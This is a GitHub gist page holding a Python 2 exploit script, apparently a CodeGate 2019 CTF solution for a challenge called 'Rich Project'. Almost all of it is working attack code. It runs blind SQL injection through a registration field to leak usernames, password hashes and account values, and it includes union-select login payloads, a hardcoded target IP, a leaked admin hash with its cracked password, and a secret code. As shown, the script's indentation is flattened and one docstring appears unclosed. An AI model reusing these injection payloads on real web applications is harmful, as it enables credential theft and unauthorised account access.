Skip to content

Instantly share code, notes, and snippets.

@stypr stypr/exploit.py
Last active Aug 17, 2019

Embed
What would you like to do?
CodeGate 2019: Rich Project exploit
import os
import urllib2
import urllib
import random
import sys
import time
import hashlib
def rand(sz=4):
return str(random.randint(10**sz, 100**sz))
COOKIE = "PHPSESSID=styprisgood1234123401" + rand(5)
def logout():
u = urllib2.Request("http://110.10.147.112/?p=logout")
u.add_header("Cookie", COOKIE)
r = urllib2.urlopen(u).read()
return r
def join(username, password, account):
print(account)
u = urllib2.Request("http://110.10.147.112/?p=reg")
u.add_header("Cookie", COOKIE)
d = urllib.urlencode({'id': username, 'pw': password, 'ac': account})
r = urllib2.urlopen(u, d).read()
return r
def info():
u = urllib2.Request("http://110.10.147.112/?p=info")
u.add_header("Cookie", COOKIE)
r = urllib2.urlopen(u).read()
return r
def pwn_mysql(blacklist):
''' leak credentials
>>> pwn_mysql(['admin', 'stypr', 'lol'])
'''
# db: userdata
# user: db_manager
# version: 5.7.25-0ubuntu
find_out = ['id', 'pw', 'ac']
b = ""
for i in blacklist:
b += "0x" + i.encode('hex')
b += ","
b = b[:-1]
blacklist = b
leaked = []
q = 0
for k in find_out:
d = ""
for i in xrange(1, 256):
logout()
# admin: 4dcc4173d80a2817206e196a38f0dbf7850188ff : ADMIN_ACC0UNTS
# cracked password = hacker
""" D0_N0T_RE1E@5E_0THER5 on board.php """
# like_prefer: LIKE search, you can just put "admin"..
like_prefer = "0x" + "%a_%".encode('hex')
''' use max(), case match, select distinct... to bypass `where` and `limit` phrase
a = join('stypr' + rand(), 'stypr' + rand(), "' + (select ascii(right(left(max(y),%s),1)) from (select distinct (case when id not in (%s) and id like %s then %s else 1337 end) as y from users)x ))#" % (i,blacklist,like_prefer,find_out[q]))
b = info()
info_rec = b.split("AC :")[1].split("<br")[0].strip()
tmp = chr(int(info_rec))
if d:
if d[-1] == tmp:
break
d += tmp
print(">>", d)
leaked.append(d)
q += 1
return leaked
def login(username, password, account):
u = urllib2.Request("http://110.10.147.112/?p=login")
u.add_header("Cookie", COOKIE)
d = urllib.urlencode({'id': username, 'pw': password, 'ac': account})
r = urllib2.urlopen(u, d).read()
return r
def reserv(timed, amount):
code = "D0_N0T_RE1E@5E_0THER5"
d = urllib.urlencode({'code': code, 'date': timed, 'amount': amount})
u = urllib2.Request("http://110.10.147.112/?p=reserv")
u.add_header("Cookie", COOKIE)
r = urllib2.urlopen(u, d).read()
return r
def pay():
u = urllib2.Request("http://110.10.147.112/?p=pay&key=D0_N0T_RE1E@5E_0THER5")
u.add_header("Cookie", COOKIE)
r = urllib2.urlopen(u).read()
return r
# robots.txt -> /top_secret.zip
# pay.php --> check pw
username = "0x" + "S'union select 1,9e99,3,4,5#".encode('hex')
password = "0x" + hashlib.sha1("stypr_is_nope").hexdigest().encode('hex')
#print join('s'+rand(), 'stypr_flag133713372', "t'),(%s,%s,1234)#" % (username,password,))
#login as S'union select 1,9e99,3,4,5# / stypr_is_nope / 1234
print login("S'union select 1,9e99,3,4,5#", "stypr_is_nope", "1234")
print pay()
@xiao-xing-yun

This comment has been minimized.

Copy link

commented Feb 11, 2019

you seem to be already stereotyped.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.